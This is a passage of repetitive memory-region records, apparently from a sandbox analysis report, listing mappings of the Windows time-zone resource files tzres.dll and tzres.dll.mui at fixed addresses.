start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3057
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3058
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3059
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3060
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3061
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3062
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3063
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3064
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3065
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3066
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3067
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3068
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3069
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3070
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3071
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3072
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3073
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3074
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3075
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3076
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3077
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3078
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3079
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3080
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3081
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3082
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3083
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3084
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3085
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3086
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3087
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3088
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3089
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3090
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3091
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3092
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3093
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3094
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3095
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3096
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3097
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3098
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3099
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3100
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3101
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3102
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3103
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3104
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3105
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3106
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3107
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3108
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3109
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3110
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3111
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3112
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3113
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3114
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3115
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3116
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3117
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3118
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3119
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3120
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3121
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3270
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3271
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3272
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3273
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3274
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3275
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3276
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3277
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3278
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3279
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3280
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3281
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3282
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3283
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3284
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3285
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3286
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3287
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3288
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3289
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3290
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3291
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3292
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3293
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3294
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3295
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3296
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3297
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3298
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3299
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3300
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3301
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3302
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3303
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3304
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3305
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3306
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3307
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3308
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3309
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3310
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3311
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3312
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3313
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3314
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3315
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3316
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3317
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3318
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3319
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
